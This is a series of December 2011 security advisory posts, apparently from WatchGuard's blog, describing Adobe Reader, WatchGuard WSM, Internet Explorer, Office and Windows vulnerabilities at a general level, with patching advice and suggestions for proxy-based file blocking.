Impact: An attacker can execute code on your computer, potentially gaining control of it

What to do: Windows users should install Adobe’s Reader and Acrobat 9.4.7 updates as soon as possible (or let Adobe’s Updater do it for you).

Exposure:

In a previous post, we warned you that attackers are currently leveraging a zero day vulnerability in Adobe Reader to launch targeted attacks against certain industries. The attack arrives as a targeted phishing email, which contains a specially crafted PDF file. If you open that PDF file, it leverages the previously unknown vulnerability to execute code on your computer, with your privileges.

Adobe promised they’d released a patch for this zero day during this week, which they just did today. According to their security bulletin, this out-of-cycle update actually corrects two security vulnerabilities, which attackers have exploited in the wild. As is typically the case with Adobe, they don’t describe the flaws in much technically detail, but they do say they involve memory corruption issues with the U3D and PRC components in Reader and Acrobat. As I mentioned before, if an attacker can entice you into opening a specially crafted PDF file, he can exploit these issues to execute code with your privileges. If you have root or system administrator privileges, the attacker gains complete control of you machine.

Solution Path

Adobe has released Windows Reader and Acrobat 9.4.7 to fix these vulnerabilities on Windows systems. Though Reader versions running on other platforms (such as Macintosh and Unix) are also susceptible to these issues, Adobe does not plan to patch them till their next quarterly update, scheduled for January 10, 2012.

It’s important to note, the more recent Reader and Acrobat X (10.1.1) versions are also vulnerable to these issue. However, Adobe does not believe attackers can exploit these flaws in the X versions due to built-in protection mechanisms. Nonetheless, they will also release Reader X updates in January.

In the meantime, Windows-based Reader and Acrobat 9.x users should download and install the following updates as soon as they can, or let Adobe’s updater do it for you.

For All WatchGuard Users:

Many WatchGuard Firebox models can block incoming PDF files. However, most administrators prefer to allow these file types for business purposes. Nonetheless, if PDF files are not absolutely necessary to your business, you may consider blocking them using the Firebox’s HTTP and SMTP proxy until the patch has been installed.

Keep in mind, our Gateway Antivirus (GAV) service does also scan PDF files for malware. In many cases, simply enabling our GAV service will protect you from these well known, public threats.

If you decide you want to block PDF documents, follow the links below for instructions on using your Firebox proxy’s content blocking features to block .pdf files by their file extension:

Like this:

Severity:High

15 December, 2011

Summary:

This vulnerability affects: WatchGuard System Manager (WSM) v11.5.1

How an attacker exploits it: Multiple vectors of attack, including enticing you to click a maliciously crafted link, or sending specially crafted network traffic through an XTM appliance and having you view the resulting logs in our Web UI

Exposure:

A few weeks ago, WatchGuard released Fireware XTM OS and WatchGuard System Manager (WSM) v11.5.1. Among other things, this release includes a newly designed Log and Report Manager Web UI, which greatly improves our logging and reporting interface, making it dramatically faster and easier to use.

However, shortly after the release of WSM v11.5.1, we learned of two privately reported and two internally discovered security issues that affect our Log and Report Manager Web UI. WSM v11.5.1 Update 1 fixes all four of those security issues. We describe these issues in a bit more detail below:

The Log and Report Manager Web UI does not properly sanitize log data it retrieves from the log database, before displaying it in the Web UI. By sending specially crafted traffic through your XTM appliance (such as maliciously crafted email or FTP connections), an attacker can fill your logs with messages that contain malicious web script. When you view these logs within the Log and Report Manager Web UI, they could trigger a Cross-Site Scripting (XSS) vulnerability, which allows the attacker to execute scripts in your web browser under the context of our Web UI. Since these malicious logs would remain in your log database until you specifically deleted them, this flaw is a persistent XSS vulnerability.

In general, attackers can leverage XSS attacks to steal your web cookies, hijack your web sessions, redirect you to malicious sites, or essentially take any action you could on the vulnerable web site. In some cases, attackers can even leverage XSS attacks to hijack your web browser, and gain unauthorized access to your computer. That said, a few factors somewhat mitigate the severity of this issue. In order to exploit this flaw, an attacker would have to know you manage a WSM server with v11.5.1. He’d also have to send very specially crafted traffic through your XTM appliance, which would need policies that allow such traffic. Finally, though this attack may allow the attacker to gain elevated privilege in your web browser, it would not give the attacker access to your XTM appliance, or the ability to change firewall rules. Nonetheless, we consider this a fairly serious vulnerability, and recommend you update as soon as you can. We’d like to thank Wayne Murphy of Sec-1 for bringing this flaw to our attention.

The Log and Report Manager Web UI also does not properly sanitize inputs entered into certain URL parameters. By enticing you to click onto a specially crafted link, or by intercepting and modifying URL parameters, an attacker could exploit this flaw to trigger another XSS vulnerability. The impact of this flaw is the same as the one described above; an attacker can leverage it to steal web cookies, hijack your web session, or essentially take any action you could in the Log and Report Web UI. This is a reflected XSS flaw since the attack only occurs once, when you click the malicious link.

Like the flaw described above, an attacker would first have to know you manage an XTM appliance with WSM v11.5.1 to exploit this flaw. Furthermore, the attacker would then need to entice you to click a malicious link, which makes this XSS vulnerability slightly less severe than the one described above. Again, we’d like to thank Wayne Murphy of Sec-1 for bringing this flaw to our attention.

Severity: Medium

Two Low-Severity Nessus-Reported Vulnerabilities

Our own internal tests identified two minor security issues in our Log and Report Web UI, which were reported by Nessus scans. You can learn more about these issues from the links provided below:

In both cases, your WSM server is protected by your XTM appliance, making it unlikely that an external attacker could exploit either of these minor flaws. We believe they pose very low risk, but still recommend you apply Update 1 as soon as you can.

Severity: Low

Solution Path:

WSM v11.5.1 Update 1 fixes all four of these security issues. XTM appliance administrators who have installed WSM v11.5.1 should download and install Update 1 at their earliest convenience.

FAQ:

Are any of WatchGuard’s other products affected?

No. To our knowledge, these vulnerabilities only affect the new WSM v11.5.1 Log and Report Manager Web UI.

What exactly are the vulnerabilities?

The worst of these four vulnerabilities are the Cross-Site Scripting (XSS) vulnerabilities, which can allow attackers to execute scripts in your web browser under the context of our Web UI. In general, attackers can leverage XSS attacks to steal your web cookies, hijack your web sessions, redirect you to malicious sites, or essentially take any action you could on the vulnerable web site. In some cases, attackers can even leverage XSS attacks to hijack your web browser, and gain unauthorized access to your computer. However, attackers cannot leverage these flaws to gain access to your XTM appliance or change firewall rules.

How serious is the vulnerability?

We believe the two XSS vulnerabilities are fairly serious. However some mitigating factors will likely limit attackers from exploiting these flaws in the real world. In general, XSS flaws can be very dangerous. Tools like the Browser Exploitation Framework (BeEF) have illustrated that attackers can leverage simple XSS flaws to gain significant control of your browser, and possibly your computer. That said, attackers would have to know a lot about you and your organization to exploit these particular XSS vulnerabilities. Specifically, they’d have to know you manage a WSM v11.5.1 server, and either get you to click a link, or view a specific log message in our Web UI. This would likely only happen in a very targeted attack. Furthermore, these flaws would not give the attacker access to your XTM appliance. That said, as a security company, WatchGuard takes any vulnerability in our products very seriously. We suggest you install WSM v11.5.1 Update 1 as soon as possible.

Other than installing Update 1, is there a workaround?

Not really. Obviously, if you avoid clicking malicious phishing links, then an attacker couldn’t exploit the reflected XSS attack. However, even the most savvy security professional sometimes can click the wrong link. If you do not allow any incoming traffic through your XTM appliance, then an attacker may not be able to booby-trap your log files with specially crafted messages. However, most organizations have policies to at least allow email traffic. This alone could allow an external attacker to corrupt your logs. We highly recommend you install WSM v11.5.1 Update 1 to correct these issues.

Where can I go to get the hotfix?

WSM 11.5.1 Update 1 is currently available in the Articles & Software section of WatchGuard’s Support Center. Look for it under the Management Software section for your XTM appliance.

How was this vulnerability discovered?

Two of these vulnerabilities were discovered by Wayne Murphy of Sec-1 (@Sec1Ltd), and confidentially reported to WatchGuard. We thank Mr. Murphy for working with us to keep our customers secure. The remaining issues were discovered internally.

Do you have any indication that this vulnerability is being exploited in the wild?

No, at this time we have no indication that these vulnerabilities are being exploited in the wild, nor do we believe them likely to be in the future.

Who can I contact at WatchGuard if I have more questions?

If you have further questions about this issue, or any other security concerns with WatchGuard products, please contact:

Severity: Medium

Summary:

This vulnerability affects: All current versions of Internet Explorer, running on all current versions of Windows

How an attacker exploits it: Typically, by enticing one of your users to visit a malicious web page

Impact: Various, in the worst case an attacker can execute code on your user’s computer, gaining complete control of it

What to do: Deploy the appropriate Internet Explorer patches immediately, or let Windows Automatic Update do it for you

Exposure:

In a security bulletin released today as part of Patch Day, Microsoft describes three new vulnerabilities in Internet Explorer (IE) 9.0 and earlier versions, running on all current versions of Windows. Microsoft rates the aggregate severity of these new flaws as Important.

The most severe of these three new IE vulnerabilities is another insecure Dynamic Link Library (DLL) loading vulnerability, similar to the ones we’ve described in many previous Microsoft alerts. In a nutshell, this class of flaw involves an attacker enticing one of your users into opening some sort of booby-trapped file from the same location as a specially crafted, malicious DLL file. If you do open the booby-trapped file, it will execute code in the malicious DLL file with your privileges. If you have local administrative privileges, the attacker could exploit this type of issue to gain complete control of your computer. In this particular case, the vulnerability is triggered specifically by HTML files.

In most cases, an attacker would have trouble exploiting this insecure library loading vulnerabilities over a network, or the Internet. Typically, they’d have to entice you to download and save both an HTML and DLL file to your desktop, then open the HTML file, which significantly mitigates the risk of the attack. Theoretically, an attacker could exploit it over a network using UNC or WebDAV locations if then can convince you to add these locations to your Windows PATH. However, that is unlikely as well.

The remaining vulnerabilities consists of a less severe Cross-Site or Cross-Domain Scripting (XSS) flaw and another information disclosure issue. Among other things, an attacker might leverage the XSS vulnerability to view information (such as cookies) from another domain or site, which he shouldn’t have access to; or to execute scripts with another domain or sites privileges. Keep in mind, today’s attackers commonly hijack legitimate web pages and booby-trap them with malicious code. Typically, they do this via hosted web ads or through SQL injectionand XSS attacks. Even recognizable and authentic websites could pose a risk to your users if hijacked in this way.

Solution Path:

These patches fix serious issues.You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.

Like this:

Summary:

These vulnerabilities affect: Most current versions of Microsoft Office for Windows and Mac, and related products like Publisher

How an attacker exploits them: Typically, by enticing you to open maliciously crafted Office documents

Impact: An attacker can execute code, potentially gaining complete control of your computer

What to do: Install the appropriate Office patches as soon as possible, or let Windows Update do it for you.

Exposure:

Today, Microsoft released five security bulletins describing nine vulnerabilities found in Microsoft Office for Windows and Mac, including related products like Microsoft Publisher and other Office components. The specific affected Office applications and components include:

Word

Excel

Powerpoint

Publisher

the optional Office Input Method Editor (IME) for Pinyin Chinese

Four of the five Office bulletins describe various code execution vulnerabilities, which all involve the way Office, and its many applications, handle different types of documents. These document handling flaws differ technically, but share the same general scope and impact. By enticing one of your users into downloading and opening a maliciously crafted Office document, an attacker can exploit any of these vulnerabilities to execute code on that user’s computer, usually inheriting that user’s level of privileges and permissions. If your user has local administrative privileges, the attacker gains full control of the user’s machine.

The only difference of note between these flaws is which type of Office document attackers can use to trigger them. The affected Office document types include, Word, PowerPoint, Excel, and Publisher files.

The fifth Office security bulletin describes a slightly less severe security vulnerability that only affects a smaller subset of Office users. The flaw specifically lies in the optional Input Method Editor (IME) for Pinyin Chinese. IMEs are optional components that allows Latin keyboard users to type non-Latin characters in Office or Windows. Unfortunately, the Office IME for Pinyin Chinese suffers from an elevation of privilege (EoP) vulnerability. If an attacker can gain local access to your computer using valid Windows credentials, she could run a specially crafted program that would give her full SYSTEM-level privileges on your computer. Of course, the attack only affects those who’ve specifically installed the Pinyin Chinese Office IME, and the attacker must have a valid login to exploit the issue.

If you’d like to learn more about each individual flaw, drill into the “Vulnerability Details” section of the security bulletins listed below:

Solution Path

Microsoft has released patches for Office to correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network as soon as possible, or let Windows Automatic Update do it for you.

For All WatchGuard Users:

Many WatchGuard appliances can block incoming Office documents. However, most administrators prefer to allow these file types for business purposes. Nonetheless, if Office documents are not absolutely necessary to your business, you may consider blocking them using our proxies, at least until you install these patches.

If you would like to use our XTM and Firebox appliance’s proxy policies to block the affected documents, follow the links below for general instructions:

Severity: High

Summary:

These vulnerabilities affect: All current versions of Windows and components that ship with it

How an attacker exploits them: Multiple vectors of attack including enticing your users to malicious web sites, or into opening booby-trapped files

Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer

What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released seven security bulletins describing the same number of vulnerabilities affecting Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity.

The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) which handles many kernel-level devices. The kernel-mode driver suffers from an input validation vulnerability involving its inability to properly parse TrueType fonts. By enticing one of your users to either visit a malicious web site, open a specially crafted document, or run a evil program, an attacker could exploit this flaw to gain complete control of your Windows computer. Attackers are currently exploiting this vulnerability in the wild with the Duqu malware. Duqu typically arrives as a spear-phishing email with a malicious Office document attachment. The attachment leverages this TrueType handling vulnerability to install the malicious Duqu worm onto your computer. We highly recommend you apply this patch as quickly as you can.

This bulletin fixes a remote code execution in Windows’ Microsoft Time component. Microsoft does not describe this Time component flaw in concise detail. They only say that it has to do with an improper use of the Time component’s “binary behavior,” which could corrupt your system state in a way that may allow attackers to execute code, and gain complete control of your computer. To do so, the attacker would first have to entice you to a specially crafted web site, or to a legitimate site that he booby-trapped with malicious code. Finally, though the flaw affects a Windows component, it also involves the way Internet Explorer (IE) interacts with that component. Luckily, only IE 6 and below are susceptible to this flaw. If you are running a more recent version of IE, you should be safe. That said, we still recommend you update the underlying, flawed Windows Time component.

Some versions of Windows (XP, Vista, and 7) ship with Media Player and Media Center, both programs that help you organize and play your multimedia content (audio, video, etc.). Media Player suffers from a memory corruption vulnerability, involving its inability to properly handle specially crafted Microsoft Digital Video Recording (.dvr-ms) media files. By enticing one of your users to open a specially crafted .dvr-ms file, an attacker can exploit this vulnerability to execute malicious code with that user’s privileges. If your users have local administrative privileges, the attacker could gain complete control of their computers.

Object Linking and Embedding (OLE) is a protocol that allows Windows to handle special compound documents, which contain embedded links to content from other document types, in other formats. OLE suffers from an unspecified object handling vulnerability, involving its inability to properly handle specially crafted OLE objects within documents. By tricking one of your users into opening a specially crafted document, an attacker could exploit this flaw to execute code on that user’s computer, with that user’s privileges. If your users have local administrative privileges, the attacker gains complete control of their machines. All Microsoft Office documents, as well as many third-party files, can contain OLE objects, which attackers can use to exploit this flaw.

Active Directory (AD) provides central authentication and authorization services for Windows computers and ships with server versions of Windows. AD suffers from a buffer overflow vulnerability involving its inability to handle specially crafted queries. By running a specially crafted program, a local attacker can exploit this flaw to execute code on your AD server, gaining complete control of it. However, the attacker would need valid domain user credentials to leverage this flaw, which significantly mitigates its severity. This vulnerability primarily poses an internal threat.

The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. By running a specially crafted application, an attacker can leverage this flaw to elevate his privilege (EoP), gaining complete, SYSTEM-level control of your Windows machine. However, in order to run his special program, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.

The kernel is the core component of any computer operating system. The Windows kernel suffers from an Elevation of Privilege (EoP) vulnerability. Like the CSRSS flaw above, by running a specially crafted program, an authenticated attacker could leverage these flaws to gain complete control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of these flaws. This flaw does not affect the 64-bit or Itanium editions of Windows.

Microsoft rating: Important

Solution Path:

Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.

For All WatchGuard Users:

Attackers can exploit these flaws using diverse exploitation methods. A properly configured firewall can mitigate the risk of some of these issues. Furthermore, WatchGuard’s proxy policies can block some of the content necessary to exploit some of these flaws. That said, our appliances cannot protect you from local attacks, nor can it prevent attacks that leverage normal HTTP traffic. Therefore, installing Microsoft’s updates is your most secure course of action.

Like this:

Santa Microsoft has come to town with a bag full of software updates for all the nice Windows administrators out there. I recommend you download, test, and install them as soon as possible. That way you can enjoy a merry, stress-free, and secure Christmas this year.

According to their summary post, Microsoft released 13 security bulletins today — one less than the 14 they originally intended. The bulletins cover flaws in Windows and its components, Office and related products, and Internet Explorer (IE). Microsoft rates three of the bulletins as Critical.

As is often the case, the Critical Microsoft bulletins fix vulnerabilities that remote attackers could exploit to execute malicious code on your machine, with little user interaction. One of the Critical updates, MS11-087, fixes the zero day kernel-mode driver vulnerability that attackers have leveraged in the wild via the well-publicized Duqu malware. Though attackers seem to have only leveraged this malware in limited, highly-targeted attacks, I still recommend you patch it first. In fact, you should probably focus on applying all of Microsoft’s three Critical updates quickly, followed by the Important ones.

You can learn more about today’s updates in Microsoft’s December summary bulletin. As is normally the case with Microsoft updates, I suggest you test the patches before deploying them in your production network — especially the ones that affect server software.

According to ComputerWorld and Symantec, Attackers are currently leveraging a zero day vulnerability in Adobe Reader in targeted attacks against telecommunications, manufacturing, computer hardware, and chemical companies, as well as defence sector organisations like Lockheed Martin.

The attacks may have started as early as the beginning of November, and arrive as a targeted phishing email with a malicious PDF attachment. If you open said attachment, your computer gets infected with information stealing malware.

Earlier this weak, Adobe confirmed this zero day flaw in a Security Advisory. The vulnerability affects all current versions of Reader and Acrobat running on any platform. Though they have not released a fix for the flaw yet, they plan to sometime next week.

Until then, we highly recommend that you inform your users to be very careful handling PDF files that come from outside your organization, whether from a trusted source or not. If you have one of our security appliances, you can also use our proxy policies to strip all PDF content if you like. That said, doing so blocks both legitimate and malicious PDF files. Also, be sure to keep both your gateway and client level antivirus software up to date, as it likely has signatures to block known variants of this attack.

As soon as Adobe releases an update to fix this issue, we will let you know in a follow-up post.

[UPDATE]:

There has also been reports of a Russian research team unveiling two zero day vulnerabilities in Adobe’s Flash Player as well. This team has no plans of informing Adobe, as they don’t believe in disclosing bugs for free. Adobe has not responded to these reports yet, but we will update you on this issues as well, as it develops. In the meantime, you can read more about these reported flaws here. — Corey Nachreiner, CISSP (@SecAdept)

Like this:

Microsoft seems to have the Christmas giving spirit this month, as they intend to release 14 new security bulletins during next Tuesday’s Patch Day. The bulletins fix a total of 20 security vulnerabilities in products like Windows, Office, and Internet Explorer, as well as other components that ship with those products. They rate three of the bulletins as Critical, and the rest as Important, and you can expect most of the updates to require a restart.

Of particular note; one of the bulletins will fix the zero day Windows kernel vulnerability used by the well publicized Duqu malware, which we described in a previous post.

You can find a bit more about these upcoming bulletins, including their order of severity, in Microsoft’s Advanced Notification post for December. As usual, I recommend you try to install these updates as quickly as possible, especially the Critical ones. I also recommend you test Microsoft patches before deploying them, mostly when applying them to production servers.

I’ll know more about these bulletins on Tuesday, December 13. Check out the WatchGuard Security Center then for our latest updates. — Corey Nachreiner, CISSP (@SecAdept)